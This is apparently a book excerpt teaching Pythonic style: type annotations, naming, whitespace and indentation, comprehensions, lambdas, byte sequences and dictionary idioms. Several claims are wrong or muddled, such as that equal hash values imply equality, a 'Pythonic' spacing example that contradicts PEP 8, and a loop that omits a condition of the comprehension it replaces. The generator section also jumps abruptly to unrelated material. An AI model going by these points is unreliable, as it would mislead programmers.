Annotations were introduced in Python with PEP 3107. They provide the functionality of giving hints to the users of the application as to what should be expected as arguments and their associated data types. Annotations enable the feature of Type Hinting in Python. They allow specifying not only the types of the expected variables, but also any metadata that can assist in getting a better idea about what the data is representing. Let us take an example to illustrate this:

class Rectangle:
    def __init__(self, length, width):
        self.length = length
        self.width = width
        self.area = 0

def area(length: float, width: float) -> Rectangle:
    """Compute area of a Rectangle given its sides"""
    …

In the preceding example, the length and width are accepted as float values. However, this is simply a suggestion to the user of this code about expectations, but Python will not be enforcing or

checking these data types. You can also specify the return type of the method.

Interestingly, built-ins and types are only some of the information that can be used with annotations. All Python interpreter entities can be placed in the annotations for use. For example, you can use a string explaining the variables’ or functions’ intentions.
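A small sketch of that idea follows; the function and the annotation strings are made up for illustration:

import time

def launch(rocket: "any object exposing an ignite() method",
           countdown: "seconds to wait before ignition" = 10) -> "True on success":
    """Start the launch sequence after the given countdown."""
    time.sleep(countdown)
    rocket.ignite()
    return True

These strings end up in launch.__annotations__ alongside any type-based annotations.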

When annotations were introduced, a special attribute called __annotations__ was added to the language, which provides an API to access the name-value pairs of the defined annotations in the form of a dictionary. For the preceding example, it would look like the following:

>>> area.__annotations__
{'length': float, 'width': float, 'return': __main__.Rectangle}

This feature can be used for documentation, running validations, or implementing data checks in the code. PEP 484 outlines some of the criteria for type hinting, which refers to the idea of checking function types with the help of annotations. However, the PEP mentions the following:

“Python will remain a dynamically typed language, and the authors have no desire to ever make type hints mandatory, even by convention.” The core idea around Type Hinting is to verify whether types are correctly being used in the code, and let the user know whether

there are any incompatibilities in the data types. An additional tool called mypy is used for this purpose. It acts like a linting utility, performing semantic checking of data types in the code, thereby proactively helping to figure out bugs.
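As a rough illustration of how this looks in practice (the file name is hypothetical, and the message wording is indicative of mypy's output format rather than an exact transcript):

$ pip install mypy
$ mypy area.py
area.py:12: error: Argument 1 to "area" has incompatible type "str"; expected "float"
Found 1 error in 1 file (checked 1 source file)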

With Python 3.5+, the typing module was updated in terms of how types and annotations are defined and used in Python. The semantics have been extended to cover more meaningful concepts and make it easier to understand what the code means or accepts. Take an example of a function that took a list or a tuple as an argument. Earlier, in the annotation, you could provide one of the two types. However, now with the updated module, it is possible to specify both the input options. Moreover, you can also provide the type that the iterable or sequence is composed of – for example, a list of floats.
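A short sketch of what this looks like with the typing module (the function itself is illustrative):

from typing import List, Tuple, Union

def scale(values: Union[List[float], Tuple[float, ...]],
          factor: float) -> List[float]:
    """Multiply every element of a list or tuple of floats by the factor."""
    return [value * factor for value in values]

Here the annotation states both acceptable container types and the element type they are expected to hold.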

Starting from Python 3.6, the library provides the means to annotate variables directly, not just with the functions or classes. This is illustrated as follows:

class Rectangle:
    length: float
    width: float
    area: float

>>> Rectangle.__annotations__
{'length': <class 'float'>, 'width': <class 'float'>, 'area': <class 'float'>}

This displays the annotated variables and their types. PEP 526 floated the idea of declaring variable types without having to assign any value to them.

Pythonic naming

Writing sensible code begins with naming a ton of entities – variables, methods, modules, classes, and packages, among others. Shorthand names will make your code look alien after some time, even to you. Long and funny names will garner a few laughs, but when, one day, you have to debug, the joke will be on you. Sensible names, on the other hand, make your code readable, and save time and effort later. You should be able to deduce the purpose of a variable, function, or class from the name itself. For the sake of readability, you should put a fair amount of thought into names, just as you would do for your code. Descriptive names are the best, as they are capable of explaining what the object represents. Single letter variables, like the infamous x we keep finding in mathematics, should be avoided at all costs, and are not considered Pythonic.

Choosing names for your variables, functions, classes, and other entities can be challenging. The best way to name your objects in Python is to use descriptive names to clarify what the object represents. Take the following example:

x = 'Nicola Tesla'
y, z = x.split()
print(z, y, sep=', ')

You could argue that this works. Yes, but you will have to keep track of what y and z, and any of the other characters that you use, represent. It may also be confusing for collaborators, especially in longer code scripts. A better alternative could be the following:

>>> name = 'Nicola Tesla'
>>> first_name, last_name = name.split()
>>> print(last_name, first_name, sep=', ')
Tesla, Nicola

This would also help avoid unnecessary inline comments. Many developers use abbreviations or shorthands to save a few microseconds of time, but that turns out to be confusing when you have multiple such entities in a code base.

def db(x):
    return x*2

Initially, when you thought of writing an API for getting the double of a variable, db seemed like a good shorthand. Then, someone else wanted to add a database, which could also be db, and that is where the problem starts. Imagine how confusing this could get over time. The only option you would be left with is to guess what your colleague meant, or analyse the code in detail to understand the meaning. A cleaner approach would be as follows:

def multiply_by_two(data):
    return data*2

Following the same philosophy, concise or descriptive names are preferable for other data types and Python objects. The following table outlines some of the common naming styles in Python code and when you should use them:

Variables: lowercase, a single letter, word, or words separated by underscores, e.g. counter, user_name
Functions and methods: lowercase words separated by underscores, e.g. compute_area, send_request
Classes and exceptions: each word capitalized without underscores (CapWords), e.g. Rectangle, InvalidOrderError
Constants: uppercase letters with words separated by underscores, e.g. MAX_RETRIES, TIMEOUT_SECONDS
Modules: short, lowercase words, with underscores if needed, e.g. utils, data_loader
Packages: short, lowercase words, preferably without underscores, e.g. requests, numpy

Table 1.1: Naming conventions of Python constructs

The preceding table illustrates some of the most common conventions followed while naming entities in Python, along with examples. Exercise caution while choosing your letters and words for naming, as it helps to write readable and maintainable code.
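A short illustrative sketch tying these conventions together (all of the names are made up):

# module: order_processing.py        (modules: short, lowercase names)

MAX_RETRIES = 3                      # constants: uppercase with underscores


class OrderProcessor:                # classes: CapWords
    def process_order(self, order_id):   # methods: lowercase with underscores
        pending_orders = []              # variables: lowercase with underscores
        pending_orders.append(order_id)
        return pending_orders


def build_processor():               # functions: lowercase with underscores
    return OrderProcessor()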

Code layout in Python

Now that we have discussed some of the building blocks, let us talk about how to effectively lay out the foundation of an application. The layout of your code plays a crucial role in deciding how readable it is. In this section, we will look into some of the commonly used conventions recommended and used in the industry for writing better Pythonic code.

Blank lines

Unlike languages of the C++ or Java family, which do not care about spaces, in Python spaces matter; not just syntactically, but because spaces also play an important role in improving the aesthetics of your code. Better-looking code does not frustrate the developers, and thereby prevents some unforced errors.

Code readability can be enhanced with the proper use of vertical whitespaces. When you club all your code together, it is overwhelming for someone reading it. On the other hand, if you put a space between every other line, it creates a sparse code, which might need unnecessary scrolling. The following are some pointers on how you should use white spaces:

Two blank lines surround classes and top-level functions in your code: This is to make them self-contained and keep their functionality isolated. This separation is made clear by the extra space.

class ClassOne:
    pass


class ClassTwo:
    pass


def my_top_level_function():
    return None

Within a given class, wrap the method definitions with a single blank line: Most methods within a class are interrelated, and a single space between them is elegant.

class MyClass:
    def first_method(self):
        return None

    def second_method(self):
        return None

Different sections within the function can be separated by spaces if they represent a series of clear steps of operation: The aggregation of process steps, separated by spaces, makes it easier to read and understand the logic. As an example, let us consider a function to calculate the variance of a list. This is a two-step problem, so each step has been indicated by leaving a blank line between them. There is also a blank line before the return statement. This helps the reader to clearly see what’s returned:

def variance_computation(list_of_numbers):
    list_sum = 0
    for num in list_of_numbers:
        list_sum = list_sum + num
    average = list_sum / len(list_of_numbers)
    sum_of_squares = 0

    for num in list_of_numbers:
        sum_of_squares = sum_of_squares + num**2
    average_of_squares = sum_of_squares / len(list_of_numbers)

    return average_of_squares - average**2

The use of vertical white space greatly increases code readability. It is a visual indicator for the developer to understand the split up logical section of the code, and how the sections are related.

Maximum line length and line breaking

PEP 8 provides a convention that a line of code should be limited to 79 characters. This convention is especially beneficial when you are editing multiple files which are opened side-by-side, while doing away with the wrapping of the lines.

Practically, it is not possible to limit every line to 79 characters; take, for example, a long string literal. There are provisions for handling such cases in PEP 8: The Python interpreter assumes that any code within a set of opening and closing parentheses, braces, or brackets is in continuation.

def sample_method(first_arg, second_arg,
                  third_arg, fourth_arg):
    return first_arg

Longer lines that are not enclosed within any of the preceding constructs can be made multi-linear with the help of a backslash.

from secretPackage import library1, \
                          library2, \
                          library3

You could also use the implied continuation in the previous example:

from secretPackage import (library1,
                           library2,
                           library3)

If you need to break a line, which has mathematical operators, it should be done before the operator. Mathematicians agree that breaking before rather than after binary operators improves readability. The following is an example of breaking before a binary operator:

# Pythonic Approach
sum = (variable_one
       + variable_two
       - variable_three)

You can immediately view what operations are taking place on which variables, as the operator is right next to the variable that is being operated on. Now, if you had used a line break after the binary operators, it would look like the following:

# Not a Pythonic Approach
sum = (variable_one +
       variable_two -
       variable_three)

This is fuzzier and makes it slightly troublesome to look for the operators if there are several in the equation. This can mess up the expression if someone adds a new variable in the middle without taking BODMAS into consideration. Even though the second case is PEP 8 compliant, it is encouraged to break before the operators, since it makes the code readable and avoids future errors.

Indentation – tabs vs. spaces

Python demarcates the levels of code with the help of indentation, which determines the statement groupings. Indentation tells the Python interpreter which code to execute when a function is called and which code belongs to a given class.

Some of the PEP 8 conventions around this that are followed industry-wide are as follows: Four consecutive spaces to be used for indicating indentation.

Prefer spaces over tabs to ensure consistency across editors.

The Python 2 interpreter can execute code even if there is a mix of tabs and spaces. If you want to verify the consistency of your code, you should use a -t flag in the command line. This will cause the interpreter to output warnings when there are differences in tabs and spaces in the code.

$ python2 -t alpha.py
alpha.py: inconsistent use of tabs and spaces in indentation

The strictness level of the checks can be increased by changing the flag to -tt. This will treat the mismatches as errors and block the execution of the code. It will also pinpoint the location of the errors in the code.

$ python2 -tt alpha.py
  File "alpha.py", line 3
    print(i, j)
              ^
TabError: inconsistent use of tabs and spaces in indentation

Python 3, on the other hand, is strict about tabs and spaces out of the box. So, when you are using Python 3, the errors are automatically reported.

$ python3 alpha.py
  File "alpha.py", line 3
    print(i, j)
              ^
TabError: inconsistent use of tabs and spaces in indentation

PEP 8 recommends using four consecutive spaces to indent. So, for the lazy folks who tire out on the three extra keys each time, I say, choose your poison wisely: tabs or spaces. Whatever you choose, be consistent with it if you want your code to run.

Most modern editors and IDEs support plugins that can normalize tabs to spaces while saving the scripts. If you are a tab person at heart, and still want the world to revere you, using such a plugin is highly recommended.

Indentation following line breaks

While truncating the lines at 79 characters, it is imperative that we use proper indentation to maintain code readability. It helps developers distinguish between two lines and a line with a break in it. Generally, we prefer the following two different ways of handling this:

Align the opening delimiter with the indented block of code.

def my_method(first_arg, second_arg,
              third_arg, fourth_arg):
    return first_arg

Sometimes, only four spaces are required for aligning with the opening delimiter. For example, in ‘if’ statements that span across multiple lines as the if, space, and opening bracket, make up four characters. In this case, it can be difficult to determine where the nested code block inside the if statement begins:

# Regular way
var = 50
if (var > 30 and
    var < 70):
    print(var)

# Pythonic way: extra indentation separates the condition from the body
var = 50
if (var > 30 and
        var < 70):
    print(var)

Whitespace around operators deserves the same attention. PEP 8 recommends surrounding binary operators (such as >, <, ==, and, or) with a single space on each side; when operators of different priorities appear in the same expression, consider adding whitespace only around the operators with the lowest priority:

# Regular way
if varx > 500 and varx % 25 == 0:
    print('That is a weird random calculation!')

# Pythonic
if varx>500 and varx%25==0:
    print('That is a weird random calculation!')

Again, consistency is the key. If you encounter lines like the following ones the first time you see a code base... Run!

# Confusion Alert!
if varx >500 and varx% 25== 0:
    print('That is a weird random calculation!')

Now, when you are slicing sequences in Python, the colons act as binary (or sometimes, unary) operators. Therefore, every convention that we discussed earlier applies: having equal spaces on both sides. Some Pythonic list slicings are outlined here:

list_variable[1:9]

# Least Priority Principle
list_variable[varx+3 : varx+7]

# Multiple occurrences
list_variable[4:6:9]
list_variable[varx+4 : varx+6 : varx+9]

# Skip the space when the colon is used as a unary operator
list_variable[varx+3 : varx+6 :]

White spaces are recommended around operators. An exception to this rule is the = sign when it is used to mark keyword arguments or default parameter values in a function signature or call.

Control structures in Python

The control flow of a Python program is regulated by conditional statements, loops, and function calls. The control structures can be of three types: Sequential, Selection, and Repetition. In this section, we will look at the intricacies of a few of these.

Complex list comprehensions

List comprehensions are a great shorthand and alternative to multi-line loops. However, they suffer from readability issues when they become complex in nature, thereby introducing errors.

For about two loops and a single condition, list comprehensions work well. Beyond that, they can hamper code readability.

Let us consider matrix transpositions as an example:

my_matrix = [[1, 2, 3],        my_matrix = [[1, 4, 7],
             [4, 5, 6],   ->                 [2, 5, 8],
             [7, 8, 9]]                      [3, 6, 9]]

Performing the operation using list comprehensions would be as follows:

result = [[my_matrix[row][col] for row in range(0, height)] for col in range(0, width)]

The concise and readable code can also be written in a better-formatted manner, adhering to the conventions discussed earlier:

result = [[my_matrix[row][col]
           for row in range(0, height)]
          for col in range(0, width)]

If you are using multiple conditions, then simple loops are preferred in place of list comprehensions. Consider the following:

weights = [100, 134, 50, 71, 13, 517, 36]
heavy = [weight for weight in weights
         if weight > 100 and weight < 500
         and weight is not None]

Now, this may seem concise, but it is not exactly readable at first glance for most people. If this had been a loop instead of a list comprehension, the code would look like the following:

weights = [100, 134, 50, 71, 13, 517, 36]
heavy = []
for weight in weights:
    if weight > 100 and weight < 500:
        heavy.append(weight)
print(heavy)

Now, doesn’t that look cleaner and simpler for reading? Personally, what I prefer to do is start my operations as list comprehensions, and as I start getting the vibes of the comprehensions becoming complex and unreadable, fall back to using loops. The bottom line – do not overuse list comprehensions or try to fit them everywhere. Choose wisely!

Lambda usage

Lambdas are not always a replacement for functions. So, how does one decide which expression deserves a lambda, and which one is an over-do? Consider this following excerpt:

my_vars = [[27], [33], [40], [85], [61], [74]]

def min_val(my_vars):
    """Find minimum value from the data list."""
    return min(my_vars, key=lambda x: len(x))

Any decent programmer can envision how to use a lambda construct. However, it takes some thinking and intuition to decide where not to. In the preceding code, the minimum value computation is a disposable lambda. However, creating a lambda expression and assigning it to a name duplicates the def functionality. This violates a PEP 8 convention, and is thereby considered non-Pythonic. The following code uses a def statement rather than assigning the lambda to a name:

# Pythonic
def f(x):
    return x*2

# Non-Pythonic
f = lambda x: x*2

Using the def statement makes sure that the function has a name, rather than simply showing up as <lambda> when a stack trace is printed to the console. The def construct also provides useful traceback information and better string representations. What you give up with an explicit def is that a lambda can be embedded directly inside a larger expression; even so, the named function is better in the end for a sustainable codebase.

Should I use a generator or a list comprehension?

The fundamental aspect on which generators differ from list comprehensions is how they use memory – the latter keeps the constituent data in memory, while the former does not (see the short sketch after the following list). The situations when you should turn to list comprehensions are as follows:

Multiple iterations over the list elements are needed.

List methods, which a generator does not provide, are needed to process the data.

Relatively small datasets that have a small memory footprint when loaded.
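As a quick sketch of the memory trade-off mentioned above (the variable names and the figures in the comments are illustrative, not exact):

from sys import getsizeof

squares_list = [n * n for n in range(100000)]   # materializes every element up front
squares_gen = (n * n for n in range(100000))    # produces elements lazily, on demand

print(getsizeof(squares_list))   # several hundred kilobytes
print(getsizeof(squares_gen))    # around a hundred bytes, independent of the range size
print(sum(squares_gen))          # a generator can only be consumed once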

Consider the following example, where a line needs to be extracted from a text file:

def read_lines_from_file(f_handle):
    """Linear processing of the file."""
    f_ref = open(f_handle, "r")
    lines_info = [ln for ln in f_ref if ln.startswith(">")]
    return lines_info

Note, in passing, that the humble str is itself an immutable sequence: iterating over it or indexing into it yields its characters, each of which is simply a string of length one.

>>> arrae = 'characters'
>>> list(arrae)
['c', 'h', 'a', 'r', 'a', 'c', 't', 'e', 'r', 's']

>>> ''.join(list(arrae))
'characters'

>>> print(type(arrae))
<class 'str'>

>>> print(type(arrae[1]))
<class 'str'>

Single byte mutable sequences with bytearray

The standard library types – bytes() and bytearray() – differ only on the mutability front. The bytearray is a mutable type and is allocated memory dynamically, and can thereby extend and shrink with changes of the elements. All other normal operations like inserts, updates, and deletes are consistent with bytes.

An immutable bytes() object can be converted to a bytearray() as an intermediary state for performing the operations, and then back into the bytes() object format. However, this can be a suboptimal way to process very large arrays since it creates a copy of the sequence in memory and is of linear complexity.

>>> arrae = bytearray((10, 9, 8, 7, 6))
>>> print(arrae[4])
6

>>> print(arrae)
bytearray(b'\n\t\x08\x07\x06')

>>> arrae[3] = 20; print(arrae)
bytearray(b'\n\t\x08\x14\x06')

>>> del arrae[1]; print(arrae)
bytearray(b'\n\x08\x14\x06')

>>> arrae.append(42); print(arrae)
bytearray(b'\n\x08\x14\x06*')

>>> arrae[1] = 290
ValueError: byte must be in range(0, 256)

>>> bytes(arrae)
b'\n\x08\x14\x06*'

Using bytes as an immutable sequence of single bytes

Similar to the str data type, bytes objects are also immutable in nature. The difference is that instead of characters, they store sequences of single bytes, each of which must satisfy the range constraint 0 <= x < 256:

>>> arrae = bytes((9, 6, 3, 2, 5, 4, 5))
>>> print(arrae[2])
3

>>> # Bytes literals have their own syntax
>>> print(arrae)
b'\t\x06\x03\x02\x05\x04\x05'

>>> # Strict range check
>>> bytes((0, 300))
ValueError: bytes must be in range(0, 256)

>>> arrae[3] = 10
TypeError: 'bytes' object does not support item assignment

>>> del arrae[3]
TypeError: 'bytes' object doesn't support item deletion

In this section, we saw the utility of Python lists and list-like data structures; however, they use a lot more space than C-arrays. The array.array type, on the other hand, is internally implemented with C-arrays and does provide better efficiency in terms of space.

Creating efficient dictionaries

For those of us coming from a C++ background, a dictionary (or dict) in Python resembles a struct data type. Dicts are part of the Python core language library and are used for storing data in the form of key-value pairs. Python also simplifies the use of dictionaries by providing efficient methods like dictionary comprehensions or the use of curly braces ({}) for convenience.

The language also imposes some restrictions on what constitutes a valid key for a dictionary. The keys will be used to index the dictionary and can be constituted of any Hashable type. A Hashable type implements the __hash__ and __eq__ methods, which provide the logic to create a hash value for the object and a mechanism to compare it with other objects, respectively. The hash value remains the same for the life of the object, and two objects having the same hash value are considered equal.

An immutable data type is also a valid dictionary key; for example, strings and integers. Tuples can also be used as dictionary keys, on the condition that the constituents of the tuple are themselves hashable types. Dictionaries are highly optimized data types, and the Python language itself uses them for several internal constructs. For example, all class attributes are stored in dictionaries internally. The same applies to variables in a stack frame. Depending on the efficiency of the hashtable implementation, a dictionary is optimal in average complexity for CRUD operations. Apart from the dictionary in the standard library, other dictionary implementations – based on skip lists and B-trees, for instance – are also available that build on the standard version with added features for ease of use.
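To illustrate the hashable-key rule described above, consider this short sketch (the keys and values are made up for the example):

>>> point_names = {(0, 0): 'origin', (1, 0): 'unit-x'}   # tuples of hashables work as keys
>>> point_names[(0, 0)]
'origin'
>>> point_names[[2, 0]] = 'invalid'   # a list is mutable, hence unhashable
TypeError: unhashable type: 'list'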

Provide default parameters while retrieving dict values

The dict.get() API supports a default value specifier. This might seem like a trivial fact, but nonetheless, most novice developers fail to make use of it. Instead of the intuitive way of using an if…else construct to first check the existence of a key, or a try…except block to check and assign default values after the dictionary retrieval, the default argument method makes life simpler and the code cleaner. This is especially beneficial while building large applications, as it also enhances readability.

The regular way:

my_car = None
if 'volvo' in ibis_cars_config:
    my_car = ibis_cars_config['volvo']
else:
    my_car = 'XC90'

The Pythonic way:

my_car = ibis_cars_config.get('volvo', 'XC90')

Default values using defaultdict for missing keys

Previously, we saw that we could use the default parameter in the get() method of a dictionary to handle the case of missing keys. Python also provides a dictionary implementation called defaultdict – a class that can accept a functor or callable during the instantiation of the class. Now, during its usage, whenever a missing key is encountered during a get operation, the return value of this function or callable is used instead. This is a more intuitive way of coding, and provides a clear view of the thought process of the developer. It saves on redundant code that would otherwise have to explicitly handle the fetching or checking of values for missing keys.

>>> from collections import defaultdict
>>> defdict = defaultdict(list)
>>> defdict['names'].append('Charles')
>>> defdict['names'].append('Kate')
>>> defdict['names'].append('Elizabeth')
>>> print(defdict['names'])
['Charles', 'Kate', 'Elizabeth']

For the preceding code fragment, the list() initialization method will be invoked when a missing key is encountered, and a default empty list ([]) will be assigned without the application developer worrying about it.

Simulate switch-case using dicts

Remember the days when you had a series of choices to make, based on different values of a variable? Languages like C++ or Java make it easier to implement a multiplexing programming paradigm with the use of the switch…case statement.

Python has done away with this construct in its implementation. The closest a novice Python programmer gets to implement a similar logic is to use a series of if…elif…else statements to choose a desired branch. The drawback of this approach is that when there are a large number of options to match and choose from, this cannot scale well.

Now, let us discuss a different workaround that you can use for a cleaner and more robust implementation of something similar to a switch…case statement. In Python, functions are implemented as first class objects. This means that they can be used as compatible values in a dictionary. What can now be achieved with a dictionary is that you can use the keys as possible values of the switch variable, which covers most of the primitive data types in Python. The values can be references to Python functions implementing what you want to do for each case statement. The Regular way:

def calculate(var1, var2, oprtr):
    if oprtr == '+':
        return var1 + var2
    elif oprtr == '-':
        return var1 - var2
    elif oprtr == '*':
        return var1 * var2
    elif oprtr == '/':
        return var1 / var2

The Pythonic way:

import operator as op

def calculate(var1, var2, oprtr):
    oprtr_dict = {'+': op.add, '-': op.sub,
                  '*': op.mul, '/': op.truediv}
    return oprtr_dict[oprtr](var1, var2)

Similar to this technique, a Factory class could be created which chooses the type to be instantiated via a parameter. This is one of the cases that makes us appreciate the “everything is an object” paradigm of Python, to find elegant solutions to otherwise difficult problems.

The Python 3.10 announcement, at the time of writing this book, talks about a match…case statement being introduced. This would be a cool feature to have, and we may not need the preceding workarounds after all.

Dict comprehensions for optimized dict construction

In a previous section, we have seen that list comprehensions offer a performance optimization over explicitly looping over the list. Dictionaries also follow a similar comprehension construct for processing the dictionary elements. The optimization comes from the fact that the processed dictionary will be created "in place".

The Regular way:

emails_for_user = {}
for user in list_of_users:
    if user.email:
        emails_for_user[user.name] = user.email

The Pythonic way:

emails_for_user = {user.name: user.email for user in list_of_users if user.email}

Maintaining key order with collections.OrderedDict

In Python 2 and earlier versions, dictionaries are implemented as simple hashtables, which can store key-value pairs. When you retrieve the list of keys, the order in which they are returned cannot be guaranteed or specified. In such cases, the collections module of the standard library in Python offers the OrderedDict implementation, which preserves the order of inserted elements in the dictionary and returns the same order when the keys are retrieved.

In [1]: import collections
        orddict = collections.OrderedDict(
            runs=110, wickets=4, overs=33)
        print(orddict)

OrderedDict([('runs', 110), ('wickets', 4), ('overs', 33)])

In [2]: orddict['hours'] = 5
        print(orddict)

OrderedDict([('runs', 110), ('wickets', 4), ('overs', 33), ('hours', 5)])

In [3]: print(orddict.keys())

odict_keys(['runs', 'wickets', 'overs', 'hours'])

In Python 3 and beyond, the ordering feature has been included in the standard dict implementation.

Dictionaries in Python 3 preserve the insertion order of the elements out of the box. For older code, use collections.OrderedDict

Using the collections.ChainMap to make multiple dictionaries searchable

A ChainMap class is provided for quickly linking a number of mappings so that they can be treated as a single unit. It is often much faster than creating a new extra dictionary and running multiple update() calls. So, why should you use this compared to an update-loop? Here's why:

Additional information: Since a ChainMap structure is “layered”, it supports answering questions like: Am I getting the “default” value, or an overridden one? What is the original (“default”) value? At what level did the value get overridden? If you are using a simple dict, the information needed for answering these questions is already lost.

Tradeoff in speed: Suppose you have N layers and at most M keys in each; constructing a ChainMap takes O(N) and each lookup takes O(N) in the worst case, while construction of a dict using an update-loop takes O(NM) and each lookup takes O(1). This means that if you construct often and only perform a few lookups each time, or if M is considerably large, the lazy-construction approach works in your favor.

When using ChainMaps for lookups, the underlying dicts are searched sequentially from left to right until the key is found. If there are multiple occurrences, then only the first occurrence is returned. Insertions, updates, and deletions only affect the first mapping added to the chain.

In [1]: from collections import ChainMap
        shard1 = {'cats': 100, 'dogs': 221, 'mice': 1200}
        shard2 = {'lions': 204, 'rabbits': 1098, 'tigers': 2}
        cmap = ChainMap(shard1, shard2)
        print(cmap)

ChainMap({'cats': 100, 'dogs': 221, 'mice': 1200}, {'lions': 204, 'rabbits': 1098, 'tigers': 2})

In [2]: cmap['rabbits']
1098

In [3]: cmap['dogs']
221

In [4]: cmap['humans']
KeyError: 'humans'

Note that the ChainMap feature is available from Python 3 onwards. For those who still cling on to Python 2.x and would want to use this feature, you can import the same from the ConfigParser package.

from ConfigParser import _Chainmap as ChainMap

Create a read-only dict with types.MappingProxyType

In most practical production applications, configuration management can be of two types – static – meaning those configs that rarely change over time, and dynamic – meaning those configs that are changing very frequently. In most Python applications, configs are conveniently stored in the form of dictionaries.

For static configs, how can one prevent the configs from being modified and impose a read-only nature? The types module in Python implements the MappingProxyType class, which is essentially a wrapper around the standard Python dictionary, and can be used as a view-only dictionary once it has been created.

In [1]: from types import MappingProxyType
        read_write_dict = {"Adele": 1024, "Sia": 908}
        read_only_dict = MappingProxyType(read_write_dict)
        print(read_only_dict)

{'Adele': 1024, 'Sia': 908}

In [2]: read_only_dict['Adele'] = 1025

TypeError: 'mappingproxy' object does not support item assignment

In [3]: read_write_dict['Adele'] = 1025
        print(read_only_dict)

{'Adele': 1025, 'Sia': 908}

In the preceding example, you cannot change the values of the read_only_dict. However, if one changes the values in the read_write_dict, the values in the read_only_dict will also change. It simply acts as a proxy for the original writable version of the dictionary.

Note that this feature is available only in Python 3 and beyond. A read-only dict is also useful to expose the internal state of a class or module as a return value, without allowing any external changes or access to the underlying object. In such cases, rather than handing out a copy of the internal dictionary, one can restrict edits by wrapping it in a MappingProxyType.
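As an illustration of this pattern, here is a minimal sketch (the Portfolio class and its holdings are made up for the example):

from types import MappingProxyType

class Portfolio:
    def __init__(self):
        self._holdings = {'AAPL': 10, 'MSFT': 5}   # internal, writable state

    @property
    def holdings(self):
        # Expose a live, read-only view instead of a defensive copy
        return MappingProxyType(self._holdings)

p = Portfolio()
print(p.holdings['AAPL'])    # 10
# p.holdings['TSLA'] = 1     # would raise TypeError: 'mappingproxy' object
                             # does not support item assignment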

Ways to sort dictionaries

As previously discussed, dictionary implementations in Python 3.x preserve the order of the keys inserted into the dictionary. However, sometimes, you might want to implement a custom ordering of the elements in the dictionary, either based on some condition on the key, values, or other related property.

Let's say we have the following dictionary:

>>> norm_dict = {'a': 4, 'c': 2, 'b': 3, 'd': 1}

An easy way of getting a sorted key-value tuple list from this dictionary would be to retrieve the items and then sort the result:

>>> sorted(norm_dict.items())

[('a', 4), ('b', 3), ('c', 2), ('d', 1)]

Python uses lexicographical order to compare sequences, and the same ordering applies when the key-value tuples are compared here. In the case of tuples, the elements are compared sequentially, one index at a time, and the comparison stops when the first difference is encountered.
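A quick illustration of this sequential comparison (the values are chosen only for the example):

>>> (1, 'b') < (1, 'c')    # first elements are equal, so 'b' vs 'c' decides
True
>>> ('a', 99) < ('b', 1)   # comparison stops at the first difference
True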

In most production applications, lexicographical sorting may not be practical. Dictionary keys are unique, so the default sorting will always be on keys. What if one wants to sort based on values? For this one can pass a callable or functor to the key parameter of the sorted method. This callable will be defined in a way to compare two elements of the sequence in a custom manner.

Do note that the key parameter has nothing to do with the dictionary keys – here it simply maps every input item to arbitrary comparison keys. An example to understand the key func better is mentioned as follows:

>>> sorted(norm_dict.items(), key=lambda x: x[1])

[('d', 1), ('c', 2), ('b', 3), ('a', 4)]

The key func concept can be used in a variety of other contexts in Python. The operator module in Python's standard library includes some common and frequently used key funcs which can be used directly, such as operator.itemgetter and operator.attrgetter. The previous example can be modified using operator.itemgetter as follows:

>>> import operator
>>> sorted(norm_dict.items(), key=operator.itemgetter(1))
[('d', 1), ('c', 2), ('b', 3), ('a', 4)]

The constructs in the operator module are more descriptive and convey the intentions of the code more clearly. However, a simple lambda function can also do the job in a readable manner and more explicitly. Lambdas should be used when you want to get better control over the granularity needed from the sorting logic.

If reverse sorting is needed, you can use the reverse=True keyword argument while invoking sorted():

>>> sorted(norm_dict.items(), key=lambda x: x[1], reverse=True)
[('a', 4), ('b', 3), ('c', 2), ('d', 1)]

Key funcs and how they work are an interesting study in Python and provide a lot of flexibility, while reducing the redundancy in coding up the logic to transform one data structure into another.

Ways to merge dictionaries

Continuing our discussion on configuration management in Python, in most modular codebases, multiple user-generated dictionaries can be used to store configs, but sometimes they might need to be combined into a single config. Let us discuss a couple of ways in which dictionaries can be combined:

>>> team_rank_map_asia = {'india': 1, 'australia': 12}
>>> team_rank_map_others = {'england': 5, 'australia': 7}

We want to create a resultant dictionary from the key-value pairs of the preceding dictionaries, keeping in mind that there can be common keys between them. In this case, a conflict resolution strategy has to be devised.

For a start, the simplest way to merge n dictionaries in Python is to use the update() method:

>>> merged_dict = {}
>>> merged_dict.update(team_rank_map_asia)
>>> merged_dict.update(team_rank_map_others)

The implementation of update() is simple. It iterates over the elements of the dicts, adding each entry to the resultant dict. If the keys are present, it overrides the previous value for the key. Hence, the last value of any duplicate key would be persisted, and the others are overwritten.

>>> merged_dict
{'india': 1, 'australia': 7, 'england': 5}

The update() calls can be chained and can be extended to any number of dictionaries.

Python also supports another method to merge a couple of dictionaries using the built-in dict() method and make use of the ** operator in order to unpack the objects.

>>> merged_dict = dict(team_rank_map_asia, **team_rank_map_others)
>>> merged_dict
{'india': 1, 'australia': 7, 'england': 5}

The preceding solution is limited by the fact that it supports the merging of two dictionaries at a time. In Python 3.5 and beyond, the ** operator also supports the merging of multiple dictionaries into one. The syntax would be as follows:

>>> merged_dict = {**team_rank_map_asia, **team_rank_map_others}

The above operates in the same way as a chain of update() calls, and returns the same result. The logic for handling the conflicts will also be the same.

>>> merged_dict
{'india': 1, 'australia': 7, 'england': 5}

The above technique appears clean and readable. Using the ** operator also gives a speedup in the case of large dictionaries, as it is optimized in the language construct itself.

Pretty printing a Python dictionary

Most application developers at some point have had to take up the painstaking exercise of debugging their code with the help of print statements to trace the flow of control. Dictionaries are syntactically elegant, but how do you preserve the same elegance when you print a dictionary, whether it is for the purpose of debugging or for logging to a file from the application? By default, Python prints dictionaries in a single line and the indentation is not preserved.

>>> config_map = {'name': 'knights_watch', 'path': '/tmp/', 'reference': 0xc0ffee}

>>> str(config_map)
"{'path': '/tmp/', 'name': 'knights_watch', 'reference': 12648430}"

When dictionaries are large and store complex data, the legibility of printing them normally reduces. One way the printing of dictionaries can be structured is to use the built-in json module in Python. Simply using json.dumps() can pretty print a dictionary with a more structured formatting:

>>> import json
>>> print(json.dumps(config_map, indent=4, sort_keys=True))
{
    "name": "knights_watch",
    "path": "/tmp/",
    "reference": 12648430
}

This does the job of making the output clearer, and normalizes the order of keys for better legibility. However, this is not always the right solution. The method from the json package only works for cases where the dict contains only the primitive data types. If you store entities like functions in the dictionary, this will not work for you:

>>> json.dumps({all: 'lets do it'})
TypeError: "keys must be a string"

Another downside of using json.dumps() is that it cannot stringify complex data types, like sets:

>>> config_map['d'] = {1, 2, 3}
>>> json.dumps(config_map)
TypeError: "set([1, 2, 3]) is not JSON serializable"

